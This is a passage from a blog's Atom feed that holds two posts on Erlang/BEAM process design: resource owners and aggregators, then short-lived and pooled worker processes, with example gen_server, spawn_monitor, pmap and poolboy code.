&lt;p&gt;&lt;strong&gt;Doing I/O inside the entity.&lt;/strong&gt; The process starts calling remote APIs,
writing to disk, or running SQL queries. This blocks the mailbox, inflates
response times, and converts a clean design into a subtle disaster.&lt;/p&gt;
&lt;p&gt;The fix is always the same: Entity Owners guard state. Workers do work.
Keep them separate.&lt;/p&gt;
&lt;h3 id=&quot;entities-with-lifecycles&quot; tabindex=&quot;-1&quot;&gt;Entities with Lifecycles&lt;/h3&gt;
&lt;p&gt;Some entities have a clear lifecycle: created, authorized, captured,
cancelled. For those, &lt;code&gt;gen_statem&lt;/code&gt; is often a better fit than &lt;code&gt;gen_server&lt;/code&gt;.
The Resource Owner idea is the same (one process owns the intent) but the
behaviour makes state transitions explicit. I will cover that pattern in a
later post.&lt;/p&gt;
&lt;h2 id=&quot;aggregators&quot; tabindex=&quot;-1&quot;&gt;Aggregators&lt;/h2&gt;
&lt;p&gt;Aggregators hold a derived or accumulated state, not a domain entity.&lt;/p&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;metrics collector&lt;/li&gt;
&lt;li&gt;sliding window counters&lt;/li&gt;
&lt;li&gt;real-time rollups (moving averages, sensor data)&lt;/li&gt;
&lt;li&gt;batch builders&lt;/li&gt;
&lt;li&gt;log aggregators before flushing to storage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Often time-based, window-based, or count-based.&lt;/li&gt;
&lt;li&gt;State is constantly updated.&lt;/li&gt;
&lt;li&gt;Output is periodic or triggered.&lt;/li&gt;
&lt;li&gt;Often respond to queries for current aggregated status.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-simple-metrics-owner&quot; tabindex=&quot;-1&quot;&gt;A Simple Metrics Owner&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(metrics_owner).
-behaviour(gen_server).

-record(state, {count = 0, sum = 0}).

-export([start_link/0, record/1, get_mean/0]).
-export([init/1, handle_call/3, handle_cast/2]).

start_link() -&amp;gt;
    gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).

record(Value) -&amp;gt;
    gen_server:cast(?MODULE, {record, Value}).

get_mean() -&amp;gt;
    gen_server:call(?MODULE, get_mean).

init([]) -&amp;gt;
    {ok, #state{}}.

handle_cast({record, Value}, #state{count = C, sum = S} = St) -&amp;gt;
    {noreply, St#state{count = C + 1, sum = S + Value}};

handle_cast(_Msg, St) -&amp;gt;
    {noreply, St}.

handle_call(get_mean, _From, #state{count = 0} = St) -&amp;gt;
    {reply, undefined, St};

handle_call(get_mean, _From, #state{count = C, sum = S} = St) -&amp;gt;
    {reply, S / C, St}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Callers send latency values with &lt;code&gt;record/1&lt;/code&gt;. The owner accumulates count
and sum. Anyone can ask for the current mean. The state stays bounded, the
interface stays simple. In real code you would want a better return type
than &lt;code&gt;undefined&lt;/code&gt;, but you get the idea.&lt;/p&gt;
&lt;h3 id=&quot;pitfalls-for-aggregators&quot; tabindex=&quot;-1&quot;&gt;Pitfalls for Aggregators&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unbounded state growth.&lt;/strong&gt; Sliding windows need pruning. Batch builders
need flush triggers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Holding giant binaries.&lt;/strong&gt; If you keep references to large binaries, the
BEAM cannot reclaim them. Copy what you need.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mixing aggregation with heavy computation.&lt;/strong&gt; Keep the owner thin.
Offload expensive work to Workers.&lt;/li&gt;
&lt;/ul&gt;
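&lt;p&gt;Pruning can be as simple as a periodic tick. A sketch, assuming the
window entries are &lt;code&gt;{Timestamp, Value}&lt;/code&gt; pairs and the state
carries a &lt;code&gt;window_ms&lt;/code&gt; field:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info(prune, #state{entries = Entries, window_ms = Window} = St) -&amp;gt;
    Now = erlang:monotonic_time(millisecond),
    %% Keep only entries younger than the window, then re-arm the timer.
    Kept = [E || {T, _} = E &amp;lt;- Entries, Now - T =&amp;lt; Window],
    erlang:send_after(1000, self(), prune),
    {noreply, St#state{entries = Kept}}.
&lt;/code&gt;&lt;/pre&gt;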
&lt;h2 id=&quot;pooled-resources&quot; tabindex=&quot;-1&quot;&gt;Pooled Resources&lt;/h2&gt;
&lt;p&gt;A pooled &amp;quot;Worker&amp;quot; holding a DB connection, socket, or crypto context is
actually a Resource Owner. It holds state (the connection), but it behaves
like a Worker while serving a request. The pool provides concurrency
control; the process provides state semantics.&lt;/p&gt;
&lt;p&gt;This is one of the few legitimate role combinations. Keep the pooled
process thin. If it starts doing heavy logic, split it: one process owns
the connection, another does the work.&lt;/p&gt;
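&lt;p&gt;With poolboy, callers never talk to the connection owner directly.
&lt;code&gt;poolboy:transaction/2&lt;/code&gt; checks a worker out, runs the fun, and
checks it back in (a sketch, assuming a pool named
&lt;code&gt;db_pool&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;query(Sql) -&amp;gt;
    poolboy:transaction(db_pool, fun(Conn) -&amp;gt;
        %% The pooled process owns the connection; we only send requests.
        gen_server:call(Conn, {query, Sql})
    end).
&lt;/code&gt;&lt;/pre&gt;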
&lt;h2 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h2&gt;
&lt;p&gt;Resource Owners give you correctness by construction.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Entity Owners: one process per domain entity.&lt;/li&gt;
&lt;li&gt;Aggregators: one process per rolling or accumulated state.&lt;/li&gt;
&lt;li&gt;Pooled resources: a valid hybrid, but keep them thin.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Prefer simple ownership over shared state or locking systems. The mailbox
is your serialization primitive. Use it.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Workers: Do One Job, Then Get Out of the Way</title>
    <link href="https://happihacking.com/blog/posts/2025/workers/"/>
    <updated>2025-11-22T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/workers/</id>
    <summary>Short-lived processes, polite pools, and where people overcomplicate things</summary>
    <content type="html">&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/worker.jpg&quot; alt=&quot;Happi with
a hardhat working with power tools.&quot; title=&quot;Happi as a worker and poolboy.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In the gnome village, a &lt;strong&gt;Worker&lt;/strong&gt; is the simplest citizen you can have.&lt;/p&gt;
&lt;p&gt;You give it a task.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It does the task.&lt;/li&gt;
&lt;li&gt;It reports back.&lt;/li&gt;
&lt;li&gt;It disappears.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That is the whole contract.&lt;/p&gt;
&lt;p&gt;On the BEAM, this maps directly to one of the most useful patterns you can
have: &lt;strong&gt;spawn a process per unit of work&lt;/strong&gt;. You get isolation, concurrency,
and fault containment almost for free. When that is not enough, you add a
pool.&lt;/p&gt;
&lt;p&gt;This post is about Workers as a process archetype: how they behave, when to
use them, when to pool them, and when you’re just building your own problem
factory.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;short-lived-workers-the-default&quot; tabindex=&quot;-1&quot;&gt;Short-Lived Workers: the default&lt;/h1&gt;
&lt;p&gt;The simplest Worker is a short-lived process:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;do(Input) -&amp;gt;
  Caller = self(),
  Ref = make_ref(),
  Worker = spawn(fun() -&amp;gt;
                   Result = do_one_job(Input),
                   Caller ! {self(), Ref, Result}
                end),
  receive
    {Worker, Ref, Result} -&amp;gt; Result
    after 5000 -&amp;gt; exit({timeout, Worker, Input})
  end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It has no history. No future. No shared state. It exists purely to handle one piece of work and then die.&lt;/p&gt;
&lt;p&gt;This works extremely well for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sending emails.&lt;/li&gt;
&lt;li&gt;Writing audit logs.&lt;/li&gt;
&lt;li&gt;Calling external APIs.&lt;/li&gt;
&lt;li&gt;Performing background calculations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You could create a worker template:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do(Fun, Input, Timeout) -&amp;gt;
  Caller = self(),
  Ref = make_ref(),
  Worker = spawn(fun() -&amp;gt;
                   Result = Fun(Input),
                   Caller ! {self(), Ref, Result}
                end),
  receive
    {Worker, Ref, Result} -&amp;gt; Result
    %% log/1 is a placeholder for your logging function
    after Timeout -&amp;gt; log({timeout, Worker, Input})
  end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the Worker crashes, only that one job is affected. The caller can in
turn time out, retry, or, as in the example, log the failure. No other
state is corrupted. The village shrugs and hires another gnome.&lt;/p&gt;
&lt;p&gt;In this version you don’t see the crash reason unless you log it somewhere
else.&lt;/p&gt;
&lt;p&gt;Now a &lt;strong&gt;linked&lt;/strong&gt; version, where the default behaviour is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“If the worker dies, I die too.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the pure YBYOYR flavour: if the worker blows up, the caller is probably in a bad state as well.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do_link_or_crash(Fun, Input, Timeout) -&amp;gt;
    Caller = self(),
    Ref = make_ref(),
    Worker = spawn_link(fun() -&amp;gt;
        Result = Fun(Input),
        Caller ! {self(), Ref, Result}
    end),
    receive
        {Worker, Ref, Result} -&amp;gt;
            Result
    after Timeout -&amp;gt;
            exit({timeout, Worker, Input})
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If &lt;code&gt;Fun(Input)&lt;/code&gt; raises an exception, the Worker exits abnormally.&lt;/li&gt;
&lt;li&gt;Because of &lt;code&gt;spawn_link/1&lt;/code&gt;, the caller gets an &lt;code&gt;&#39;EXIT&#39;&lt;/code&gt; signal and dies too.&lt;/li&gt;
&lt;li&gt;You either get a &lt;code&gt;Result&lt;/code&gt; or your process crashes and lets a supervisor
deal with it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the &lt;strong&gt;simplest linked worker&lt;/strong&gt;: either success or crash. No middle
ground.&lt;/p&gt;
&lt;h3 id=&quot;handling-worker-crashes-without-dying&quot; tabindex=&quot;-1&quot;&gt;Handling worker crashes without dying&lt;/h3&gt;
&lt;p&gt;If you want to catch worker failures &lt;strong&gt;without linking lifetimes&lt;/strong&gt; and
without turning your process into an accidental supervisor, use
&lt;strong&gt;&lt;code&gt;spawn_monitor&lt;/code&gt;&lt;/strong&gt;. It gives you a &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; message on crash, and it never
kills the caller.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do_monitor(Fun, Input, Timeout) -&amp;gt;
    Caller = self(),
    {Worker, MonRef} =
        spawn_monitor(fun() -&amp;gt;
            Result = Fun(Input),
            Caller ! {self(), {ok, Result}}
        end),
    receive
        {Worker, {ok, Result}} -&amp;gt;
            %% Flush the &#39;DOWN&#39; message the monitor delivers when
            %% the worker exits normally.
            erlang:demonitor(MonRef, [flush]),
            {ok, Result};
        {&#39;DOWN&#39;, MonRef, process, Worker, Reason} -&amp;gt;
            {error, {worker_crashed, Reason}}
    after Timeout -&amp;gt;
            %% Stop watching a worker we no longer care about.
            erlang:demonitor(MonRef, [flush]),
            {error, {timeout, Worker, Input}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On success we get &lt;code&gt;{ok, Result}&lt;/code&gt; directly from the worker.&lt;/li&gt;
&lt;li&gt;If the worker crashes we receive a &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; message with the reason.&lt;/li&gt;
&lt;li&gt;On timeout we return &lt;code&gt;{error, {timeout, Worker, Input}}&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;spawn_monitor&lt;/code&gt; is a good default when you want robust workers but don’t
want to tie your fate to theirs. It gives you explicit crash information
without the subtle semantics of links or the global side-effects of
&lt;code&gt;trap_exit&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In many cases, this is the simplest and safest synchronous worker pattern
to drop into production.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;asynchronous-workers-fire-and-forget-asyncawait&quot; tabindex=&quot;-1&quot;&gt;Asynchronous workers: fire-and-forget + async/await&lt;/h2&gt;
&lt;p&gt;Next step: separate &lt;strong&gt;starting the worker&lt;/strong&gt; from &lt;strong&gt;waiting for the result&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id=&quot;fire-and-forget&quot; tabindex=&quot;-1&quot;&gt;Fire and forget&lt;/h3&gt;
&lt;p&gt;The most basic async worker:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;fire_and_forget(Fun, Input) -&amp;gt;
    _Pid = spawn(fun() -&amp;gt; Fun(Input) end),
    ok.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You don’t know if it succeeds. You don’t know when. Sometimes that is fine
(e.g. “best-effort” metrics, logging to a third-party system). Often it’s
not.&lt;/p&gt;
&lt;h3 id=&quot;async-handle-start-now-await-later&quot; tabindex=&quot;-1&quot;&gt;Async handle: start now, await later&lt;/h3&gt;
&lt;p&gt;Better: return a handle &lt;code&gt;{Pid, Ref}&lt;/code&gt; and let the caller decide when (or if)
to wait.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_async_start(Fun, Input) -&amp;gt;
    Caller = self(),
    Ref = make_ref(),
    Pid = spawn(fun() -&amp;gt;
        Result = Fun(Input),
        Caller ! {self(), Ref, {ok, Result}}
    end),
    {Pid, Ref}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To wait for it:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_async_await({Pid, Ref}, Timeout) -&amp;gt;
    receive
        {Pid, Ref, {ok, Result}} -&amp;gt;
            {ok, Result}
    after Timeout -&amp;gt;
            {error, {timeout, Pid}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;non-blocking&lt;/strong&gt; call to start work.&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;separate&lt;/strong&gt; blocking call to await, with its own timeout.&lt;/li&gt;
&lt;li&gt;Freedom to stash the handle in state, pass it to another process, or
ignore it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can obviously extend this to handle crashes by using &lt;code&gt;spawn_monitor/1&lt;/code&gt;
instead of &lt;code&gt;spawn/1&lt;/code&gt; and handling &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; messages, but that’s the same
pattern with one extra branch.&lt;/p&gt;
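&lt;p&gt;A hedged sketch of that monitored variant (the function names are mine;
the message shape matches &lt;code&gt;worker_async_start/2&lt;/code&gt; above):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_async_start_monitored(Fun, Input) -&amp;gt;
    Caller = self(),
    Ref = make_ref(),
    {Pid, MonRef} = spawn_monitor(fun() -&amp;gt;
        Result = Fun(Input),
        Caller ! {self(), Ref, {ok, Result}}
    end),
    {Pid, Ref, MonRef}.

worker_async_await_monitored({Pid, Ref, MonRef}, Timeout) -&amp;gt;
    receive
        {Pid, Ref, {ok, Result}} -&amp;gt;
            erlang:demonitor(MonRef, [flush]),
            {ok, Result};
        {&#39;DOWN&#39;, MonRef, process, Pid, Reason} -&amp;gt;
            {error, {worker_crashed, Reason}}
    after Timeout -&amp;gt;
            erlang:demonitor(MonRef, [flush]),
            {error, {timeout, Pid}}
    end.
&lt;/code&gt;&lt;/pre&gt;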
&lt;hr /&gt;
&lt;h2 id=&quot;parallelism-workers-as-fan-outfan-in&quot; tabindex=&quot;-1&quot;&gt;Parallelism: workers as fan-out/fan-in&lt;/h2&gt;
&lt;p&gt;Now the fun part: use Workers to process &lt;strong&gt;parts of a problem in parallel&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Imagine a simple &lt;code&gt;pmap/2&lt;/code&gt; (parallel map):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;pmap(Fun, List) -&amp;gt;
    Caller = self(),
    % Start one worker per item
    Pids = [spawn(fun() -&amp;gt;
                      Result = Fun(X),
                      Caller ! {self(), Result}
                  end)
            || X &amp;lt;- List],
    collect_results(Pids, []).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;collect_results/2&lt;/code&gt; can be:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;collect_results([], Acc) -&amp;gt;
    lists:reverse(Acc);
collect_results([Pid | Rest], Acc) -&amp;gt;
    receive
        {Pid, Result} -&amp;gt;
            collect_results(Rest, [Result | Acc])
    after 5000 -&amp;gt;
            exit({timeout_waiting_for, Pid})
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;One worker per element&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Each worker replies with &lt;code&gt;{Pid, Result}&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Results are collected in the same order as the original list, because we
walk the &lt;code&gt;Pids&lt;/code&gt; list in order.&lt;/li&gt;
&lt;li&gt;If the worker for a given &lt;code&gt;Pid&lt;/code&gt; is slow or stuck, we block there and
earlier results from other workers will sit in the mailbox until we get
to their PID. That’s intentional: we are enforcing ordered results.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You’ve just implemented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Fan-out&lt;/strong&gt;: spawn a Worker per “chunk”.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fan-in&lt;/strong&gt;: collect results by &lt;code&gt;Pid&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Clear fault model: each Worker is semi-independent; one crash doesn’t
poison others, but we lose the result.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can refine this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ignore timed-out results, and later drain the mailbox to get rid of late
replies.&lt;/li&gt;
&lt;li&gt;Ignore the result entirely if the only thing you care about is the side
effect (for example, sending an email).&lt;/li&gt;
&lt;li&gt;Chunk the list (e.g. 100 items per Worker) if the list is huge.&lt;/li&gt;
&lt;li&gt;Use a fixed-size pool instead of unbounded spawns if external resources
are involved. We will look at pooled workers soon.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;spawn_link&lt;/code&gt; or &lt;code&gt;spawn_monitor&lt;/code&gt; for stricter crash semantics and
better visibility into failures.&lt;/li&gt;
&lt;/ul&gt;
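&lt;p&gt;As an illustration of the first refinement, one possible sketch (the
function names are mine, and the drain clause assumes workers reply with
&lt;code&gt;{Pid, Result}&lt;/code&gt; as in &lt;code&gt;pmap/2&lt;/code&gt; above):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;collect_or_skip([], Acc) -&amp;gt;
    lists:reverse(Acc);
collect_or_skip([Pid | Rest], Acc) -&amp;gt;
    receive
        {Pid, Result} -&amp;gt;
            collect_or_skip(Rest, [{ok, Result} | Acc])
    after 5000 -&amp;gt;
            %% Give up on this worker but keep collecting the rest.
            collect_or_skip(Rest, [{error, {timeout, Pid}} | Acc])
    end.

%% Call once afterwards to throw away replies that arrived too late.
%% Careful: this matches any {Pid, _} two-tuple, so only use it when
%% the mailbox cannot contain other messages of that shape.
drain_late_replies() -&amp;gt;
    receive
        {Pid, _Late} when is_pid(Pid) -&amp;gt; drain_late_replies()
    after 0 -&amp;gt; ok
    end.
&lt;/code&gt;&lt;/pre&gt;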
&lt;hr /&gt;
&lt;p&gt;Short-lived Workers align perfectly with the BEAM’s strengths. Processes
are cheap to spawn and cheap to terminate. The scheduler is designed for
this. Concurrency is the default setting, not something you have to fight
for.&lt;/p&gt;
&lt;p&gt;The main way to misuse short-lived Workers is to spawn them without any
thought of &lt;strong&gt;rate&lt;/strong&gt;. If every incoming HTTP request spawns ten internal
Workers that talk to five different external services, you now have a
&lt;strong&gt;fan-out explosion&lt;/strong&gt; and a new surprise: your outbound traffic graph.&lt;/p&gt;
&lt;p&gt;Workers are cheap. External systems are not.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;when-a-worker-becomes-a-pool-member&quot; tabindex=&quot;-1&quot;&gt;When a Worker Becomes a Pool Member&lt;/h2&gt;
&lt;p&gt;Sometimes “spawn as many as you like” is not the right choice. You may
have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A database that only handles 50 concurrent connections without melting.&lt;/li&gt;
&lt;li&gt;An external API with strict rate limits.&lt;/li&gt;
&lt;li&gt;A crypto context or GPU handle that is too expensive to recreate for
every job.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In these cases you want &lt;strong&gt;many callers&lt;/strong&gt;, but &lt;strong&gt;only a controlled number of
Workers running at the same time&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;That is all a Worker pool is.&lt;/p&gt;
&lt;p&gt;The BEAM ecosystem has several reliable implementations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;poolboy&lt;/strong&gt;: the classic Erlang pool, battle-tested for a decade.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;pooler&lt;/strong&gt;, &lt;strong&gt;poolgirl&lt;/strong&gt;, and &lt;strong&gt;worker_pool&lt;/strong&gt;: Erlang
alternatives with different trade-offs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Poolex&lt;/strong&gt; and others on the Elixir side.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of them follow the same idea:&lt;/p&gt;
&lt;p&gt;You have a &lt;em&gt;fixed number of Workers&lt;/em&gt;, and callers borrow one Worker at a
time to perform a job.&lt;/p&gt;
&lt;p&gt;A poolboy-style call looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;poolboy:transaction(MyPool, fun(WorkerPid) -&amp;gt;
    gen_server:call(WorkerPid, {do, Job})
end).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Callers never talk to the Worker directly. They talk to the &lt;strong&gt;pool&lt;/strong&gt;, and
the pool manages who gets to run work next.&lt;/p&gt;
&lt;p&gt;The reason for this setup is simple: &lt;strong&gt;limit concurrency&lt;/strong&gt; around a scarce
resource.&lt;/p&gt;
&lt;p&gt;The Worker archetype stays the same. It still does &lt;strong&gt;one job at a time&lt;/strong&gt;.
The only difference is that some Workers are now part of a coordinated
“team” rather than being spawned freely.&lt;/p&gt;
&lt;p&gt;If the Worker crashes while doing a job, supervision restarts it and the
Worker returns to the pool. The pool continues to behave exactly the same,
which is why people like it.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;a-note-about-hybrids-but-were-not-going-there-yet&quot; tabindex=&quot;-1&quot;&gt;A Note About Hybrids (But We’re Not Going There Yet)&lt;/h2&gt;
&lt;p&gt;Sometimes a pooled Worker also holds a long-lived resource (like a DB
connection). That means it is &lt;em&gt;also&lt;/em&gt; a kind of Resource Owner.&lt;/p&gt;
&lt;p&gt;This is one of the few valid cases where an archetype can be “mixed”, and
we’ll talk about it later when we get to resource owners.&lt;/p&gt;
&lt;p&gt;For now, keep Worker pools conceptually simple:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;They exist to limit concurrency.
All the Worker does is: &lt;strong&gt;one job at a time&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We’ll revisit the “Workers that hold state” pattern in the upcoming
&lt;strong&gt;Resource Owner&lt;/strong&gt; post.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;when-not-to-pool-workers&quot; tabindex=&quot;-1&quot;&gt;When &lt;em&gt;not&lt;/em&gt; to pool Workers&lt;/h1&gt;
&lt;p&gt;People see Worker pools and get excited. They then start pooling
everything.&lt;/p&gt;
&lt;p&gt;Do not pool CPU-bound Workers that use only local state. The BEAM is
already a giant dynamic pool with preemptive scheduling and excellent
fairness. Adding a pool on top usually adds serialization and queueing
where you don’t need it.&lt;/p&gt;
&lt;p&gt;A few simple rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If the Worker only touches &lt;strong&gt;local memory&lt;/strong&gt; and pure CPU, you probably do
&lt;strong&gt;not&lt;/strong&gt; need a pool. Just spawn as needed.&lt;/li&gt;
&lt;li&gt;If the Worker wraps a &lt;strong&gt;scarce external resource&lt;/strong&gt; (DB connection, API
client, file descriptor), a pool is probably a good idea.&lt;/li&gt;
&lt;li&gt;If you have a performance problem and your first instinct is “add a
pool”, check your external dependencies and message rates first.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Worker pool is not a performance tool. It is a &lt;strong&gt;safety tool&lt;/strong&gt; to avoid
exhausting external resources. If you turn it into a global throttle for
all work, you will get exactly that: a global throttle.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;routing-versus-checkout-pools&quot; tabindex=&quot;-1&quot;&gt;Routing versus checkout pools&lt;/h1&gt;
&lt;p&gt;There are two broad ways to structure pooled Workers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Checkout pools&lt;/strong&gt; are what poolboy does. Callers ask the pool for a
Worker, use it, and return it when done. This makes sense for blocking
flows with exclusive use of a resource, like a DB connection.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Routing pools&lt;/strong&gt; are different. Callers never see individual Workers. They
send messages to a Router, which distributes work across Workers. Andrea
Leopardi’s post on process pools with Elixir’s &lt;code&gt;Registry&lt;/code&gt; is a good example
of this style. &lt;a href=&quot;https://andrealeopardi.com/posts/process-pools-with-elixirs-registry/&quot;&gt;&amp;quot;Process pools with Elixir&#39;s Registry&amp;quot;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For the Worker archetype, both styles are still Workers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In a checkout pool, the Worker is checked out, does one job, returns to
idle.&lt;/li&gt;
&lt;li&gt;In a routing pool, the Worker receives jobs via messages, does one at a
time, and stays alive.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The choice is about &lt;strong&gt;how callers coordinate&lt;/strong&gt;, not about what the Worker
is.&lt;/p&gt;
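&lt;p&gt;To make the distinction concrete, here is a deliberately tiny
routing-pool sketch (my own naming; no supervision and no overload
handling, which real code would add via a registry or a pool library):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% The router owns a fixed set of long-lived workers and round-robins
%% jobs across them. Callers only ever talk to the router.
start_router(N, Fun) -&amp;gt;
    Workers = [spawn(fun() -&amp;gt; worker_loop(Fun) end)
               || _ &amp;lt;- lists:seq(1, N)],
    spawn(fun() -&amp;gt; router_loop(Workers) end).

router_loop([W | Rest]) -&amp;gt;
    receive
        {job, From, Input} -&amp;gt;
            W ! {job, From, Input},
            router_loop(Rest ++ [W])
    end.

worker_loop(Fun) -&amp;gt;
    receive
        {job, From, Input} -&amp;gt;
            From ! {result, self(), Fun(Input)},
            worker_loop(Fun)
    end.
&lt;/code&gt;&lt;/pre&gt;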
&lt;hr /&gt;
&lt;h1 id=&quot;failure-cheap-and-local&quot; tabindex=&quot;-1&quot;&gt;Failure: cheap and local&lt;/h1&gt;
&lt;p&gt;A short-lived Worker that crashes is easy to reason about. You get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One failed job.&lt;/li&gt;
&lt;li&gt;A stacktrace.&lt;/li&gt;
&lt;li&gt;No lingering state.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A pooled Worker that crashes is also manageable, as long as supervision is
correct. A Supervisor can restart the Worker with a fresh connection. The
pool continues to function.&lt;/p&gt;
&lt;p&gt;The problems start when you accidentally promote the Worker into a &lt;strong&gt;God
process&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It now keeps global state.&lt;/li&gt;
&lt;li&gt;It routes messages.&lt;/li&gt;
&lt;li&gt;It logs.&lt;/li&gt;
&lt;li&gt;It supervises others.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At that point, when it crashes, your system has an existential crisis
instead of a minor incident.&lt;/p&gt;
&lt;p&gt;A Worker should &lt;strong&gt;never&lt;/strong&gt; supervise, route, or own global state. It should
&lt;em&gt;work&lt;/em&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;how-this-maps-to-javas-new-toys&quot; tabindex=&quot;-1&quot;&gt;How this maps to Java’s new toys&lt;/h1&gt;
&lt;p&gt;Java has finally discovered that threads don’t need to weigh as much as
small cars. With Project Loom and structured concurrency you now get
&lt;strong&gt;virtual threads&lt;/strong&gt; and &lt;strong&gt;task scopes&lt;/strong&gt;: lighter, cheaper, and with a
lifespan you can reason about. On a good day they even feel a little like
BEAM processes.&lt;/p&gt;
